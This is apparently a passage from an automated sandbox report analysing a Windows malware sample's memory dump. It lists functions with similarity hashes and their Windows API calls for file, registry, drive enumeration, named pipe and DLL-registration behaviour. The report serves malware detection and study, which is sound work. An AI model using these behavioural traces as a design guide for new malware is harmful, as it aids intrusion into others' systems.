    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
